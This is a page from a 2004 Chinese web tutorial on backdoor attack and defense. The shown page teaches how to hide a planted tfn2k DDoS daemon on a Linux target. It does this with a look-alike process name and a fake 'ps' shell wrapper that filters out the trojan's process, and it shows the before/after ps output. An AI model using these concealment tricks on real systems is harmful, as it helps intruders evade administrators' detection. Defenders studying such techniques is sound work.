,黑客技术   工具软件   办公软件   操作系统   网络安全   设计在线   程序开发   教程宝典   软件下载   软件论坛,黑客技术
您的位置:软件 > 网络安全 > 黑客技术 > 正文
“后门”的攻击与防御
[文章信息]
作者:天缘
时间:2004-10-21
出处:天极网
责任编辑:原野
[文章导读]
广大的网络中,潜藏着无尽的危机与陷阱。而其中一种非常出名的陷阱,叫做“后门”……
advertisement
热点推荐
· 深入探讨SQL Server 2000对XML的支持
· Swing(空)
· 3DS Stodio Max 宝典
· 中小企业服务器配置方案--前 言
· 中小企业服务器配置方案--代理接入服务器(3)
[正文]

上一页  1 2 3 4 5 6 7  下一页

  好了,现在回忆一下,通过哪些途径有可能发现我们运行着的这个程序呢??

  ps命令 发现后门程序进程
  netstat 命令 发现监听端口异常
  top 查看时发现

  现在我们依次来想想隐藏的对应方法:

  top命令中只显示进程名而不显示路径,我们可以用一个比较like系统正式进程的名字蒙混过去,例如在config.h中将tfn2k的进程名改为snnpd这样容易和snmpd相似的名字;

  ps命令。。。如果有办法能够把ps命令中的关于我们程序那行去掉不是就ok了??ok,写一个名字是ps的shell,丢到我们的目录下,比如/home/skylove (模拟了啦,用个简单点的)

  首先,我们把这个shell也命名为ps,然后输入以下的内容

  #!/bin/sh
  /bin/ps $* | grep -v tfn-daemon | grep -v grep

  记得把这个shell的权限改正确,下面我们来解释一下这句shell的含义

  $*表示的是这个shell获取的所有参数,ps $* 表示调用系统的命令ps加参数来例出进程列表,然后将结果重定向到 grep –v tfn-daemon这句里,而这一条命令的意思则是从前面ps命令列出的所有进程中,把含有关键字 tfn-daemon的这个进程去掉,最后一句则表示把grep命令本身去掉,当然这一句可用也可不用。好了,让我们整体上来看看执行了这个shell之后的效果吧:

  首先,我们用系统的ps –aux命令来列出进程,得到类似这样的结果:

  postfix 13922 0.0 1.7 13108 2232 ?  S Oct17  0:00 /usr/sbin/httpd
  skylove 9641 0.0 0.2 1444 284 ?   S 11:34  0:00 tfn-daemon
  postfix 15943 0.0 0.7 3148 988 ?  S 16:00  0:00 pickup -l -t fifo -u
  skylove 17083 0.0 1.4 6800 1784 ?  S 16:48  0:00 /usr/sbin/sshd

  接着用./ps –aux 执行我们的shell的结果,则得到的是:

  postfix 13922 0.0 1.7 13108 2232 ?  S Oct17  0:00 /usr/sbin/httpd
  postfix 15943 0.0 0.7 3148 988 ?  S 16:00  0:00 pickup -l -t fifo -u
  skylove   17083 0.0 1.4 6800 1784 ? S 16:48  0:00 /usr/sbin/sshd

  看到没?? 显示我们木马的那条进程就此不再显示了!这样一来,就做到了我们的进程的隐藏。而且对待任何的真实ps命令的合法参数都可以成功执行,包括无参数的情形——时刻要记得,做后门玩的是“合金装备”,暴露一次就完蛋!

  但目标机的用户查看进程的时候使用的是ps,而不是我们目录下的这个名叫ps 的小shell啊!! 别着急,后面我们会有办法d~~~

  耐着性子,接下来用类似的方式写一个叫做netstat 的shell


上一页  1 2 3 4 5 6 7  下一页

发表评论推荐给朋友我想参加相关培训打印我对此感兴趣订阅电子杂志
天极社区邀请您:写博客日记  上传相片   论坛聊天  订阅电子杂志  推荐网摘   免费图铃工具
笔名:   请您注意:

 遵守国家有关法律、法规,尊重网上道德,承担一切因您的行为而直接或间接引起的法律责任。

 天极网拥有管理笔名和留言的一切权利。
评论:
 
,黑客技术相关内容,黑客技术焦点新闻
  • 卸除NetBIOS系统后门
  • 揭开网络"后门"的面纱(下)
  • 揭开网络"后门"的面纱(上)
  • 超初级的Linux后门制作方法
  • 爱情后门变种T病毒介绍及防范
  • Win2000/XP服务与后门技术
  • IIS永远的后门
  • 网络后门面面观
  • FVD刺激高清碟机加速商业化 抢占商机最重要
  • 3家搜索引擎集体诉讼8848 吕春维未敢出席
  • 杨元庆:没有准备不会获批的备用方案
  • 军队信息化诞生新领域 电子军务呼之欲出
  • 世界经济论坛公布信息化程度全球最新排名
  • 2004政务绩效评估:政府门户尚处于发展阶段
  • 甲骨文出资5.15亿美元 意图收购RetekInc
  • 技术并购:帮你突破传统增长的“天花板”
  • ,黑客技术Advertisement